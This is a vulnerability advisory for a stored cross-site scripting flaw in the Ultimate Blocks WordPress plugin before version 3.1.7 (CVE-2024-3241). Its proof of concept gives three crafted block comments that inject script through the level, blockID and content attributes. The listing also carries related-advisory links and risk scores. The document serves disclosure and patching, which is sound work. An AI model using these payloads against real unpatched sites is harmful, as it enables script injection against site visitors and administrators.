Lucene search
Dmitrii IgnatyevWPEX-ID:A645DAEE-42EA-43F8-9480-EF3BE69606E0HistoryApr 23, 2024 - 12:00 a.m.
Ultimate Blocks < 3.1.7 - Contributor+ Stored XSS
2024-04-2300:00:00
Dmitrii Ignatyev
34
ultimate blocks
contributor+
stored xss
poc disclosure
may 07 2024
update
exploit
Description The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the below code in a post while in Code Editor mode:
<!-- wp:ub/advanced-heading {"blockID":"aaa","level":"img src=x onerror=alert(/XSS-level/)","fontSize":29,"fontFamily":"Cardo","lineHeight":35} /-->
<!-- wp:ub/advanced-heading {"blockID":"\u0022src onerror=alert(/XSS-BlockID/)//","level":"img","fontSize":29,"fontFamily":"Cardo","lineHeight":35} /-->
<!-- wp:ub/advanced-heading {"blockID":"a","level":"script","content":"alert(/XSS-content/)","fontSize":29,"fontFamily":"Cardo","lineHeight":35} /-->References
Related
wpvulndb
wpvulndb
Ultimate Blocks < 3.1.7 - Contributor+ Stored XSS
2024-04-23 00:00:00
cvelist
cvelist
CVE-2024-3241 Ultimate Blocks < 3.1.7 - Contributor+ Stored XSS
2024-05-14 06:00:02
nvd
nvd
CVE-2024-3241
2024-05-14 16:17:31
CVE-2024-2041
2024-05-06 14:15:07
cve
cve
CVE-2024-3241
2024-05-14 16:17:31
CVE-2024-2041
2024-05-06 14:15:07
vulnrichment
vulnrichment
CVE-2024-3241 Ultimate Blocks < 3.1.7 - Contributor+ Stored XSS
2024-05-14 06:00:02
wordfence
wordfence
AI Score
8.3
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:A645DAEE-42EA-43F8-9480-EF3BE69606E0